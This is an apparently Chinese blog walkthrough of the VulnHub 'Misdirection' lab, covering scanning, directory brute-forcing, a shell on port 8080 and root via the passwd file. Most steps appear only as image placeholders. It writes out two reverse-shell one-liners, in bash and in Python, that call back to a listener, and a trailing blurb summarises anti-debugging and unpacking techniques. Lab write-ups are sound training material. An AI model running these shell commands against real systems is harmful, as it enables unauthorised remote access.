Misdirection(VulnHub)

Misdirection

nmap扫描

image-20240203164134251

image-20240203164754661

image-20240203172258318

image-20240203173521959

image-20240203173548744

image-20240203164806659

目录爆破

image-20240203220722752

image-20240203220905136

80小探索

image-20240203221120213

searchsploit

image-20240203170135683

无果

8080端口渗透

image-20240203221043014

反弹shell

bash -i >& /dev/tcp/192.168.2.228/11111 0>&1

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.228",11111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20240203221740291

image-20240203221811876

sudo -l

image-20240203223958515

设变量清屏

image-20240203224521967

brexit用户渗透

image-20240203224711794

image-20240203224845835

查看敏感文件

image-20240203225551515

通过psswd提权

image-20240203232318991

image-20240203232402521

image-20240203232423553

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
脱壳是门艺术——脱壳既是一种心理挑战,同时也是逆向领域最为激动人心的智力游戏之一。为了甄别或解决非常难的反逆向技巧,逆向分析人员有时不得不了解操作系统的一些底层知识,聪明和耐心也是成功脱壳的关键。这个挑战既牵涉到壳的创建者,也牵涉到那些决心躲过这些保护的脱壳者。 本文主要目的是介绍壳常用的反逆向技术,同时也探讨了可以用来躲过或禁用这些保护的技术及公开可用的工具。这些信息将使研究人员特别是恶意代码分析人员在分析加壳的恶意代码时能识别出这些技术,当这些反逆向技术阻碍其成功分析时能决定下一步的动作。第二个目的,这里介绍的信息也会被那些计划在软件中添加一些保护措施用来减缓逆向分析人员分析其受保护代码的速度的研究人员用到。当然没有什么能使一个熟练的、消息灵通的、坚定的逆向分析人员止步的。 电子书目录: 脱壳的艺术 1 概述: 2 1简介 3 2 调试器检测技术 4 2.1 PEB.BeingDebugged Flag : IsDebuggerPresent() 4 2.2 PEB.NtGlobalFlag , Heap.HeapFlags, Heap.ForceFlags 4 PEB.NtGlobalFlag 4 Heap Flags 4 2.3 DebugPort: 5 CheckRemoteDebuggerPresent()/NtQueryInformationProcess() 5 2.4 Debugger Interrupts 7 2.5 Timing Checks 8 2.6 SeDebugPrivilege 8 2.7 Parent Process(检测父进程) 9 2.8 DebugObject: NtQueryObject() 9 2.9 Debugger Window 10 2.10 Debugger Process 11 2.11 Device Drivers 11 2.12 OllyDbg:Guard Pages 11 3 断点和补丁检测技术 13 3.1 Software Breakpoint Detection 13 3.2 Hardware Breakpoint Detection 13 3.3 Patching Detection via Code Checksum Calculation 14 4反分析技术 15 4.1 Encryption and Compression 15 加密壳 15 Compression 16 4.2 Garbage Code and Code Permutation 16 Garbage Code 16 Code Permutation 17 4.3 Anti-Disassembly 18 5 调试器攻击技术 20 5.1 Misdirection and Stopping Execution via Exceptions 20 5.2 Blocking Input 21 5.3 ThreadHideFromDebugger 22 5.4 Disabling Breakpoints 22 5.5 Unhandled Exception Filter 23 5.6 OllyDbg:OutputDebugString() Format String Bug 24 6. 高级及其它技术 24 6.1 Process Injection 24 6.2 Debugger Blocker 25 6.3 TLS Callbacks 25 6.4 Stolen Bytes 27 6.5 API Redirection 27 6.6 Multi-Threaded Packers 28 6.7 Virtual Machines 28 7. 工具 29 7.1 OllyDbg 29 7.2 Ollyscript 29 7.3 Olly Advanced 29 7.4 OllyDump 30 7.5 ImpRec 30 8 参考 30 书籍:Windows和处理器底层 30 链接:Windows底层 30 链接:逆向工程,软件保护,脱壳 30

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值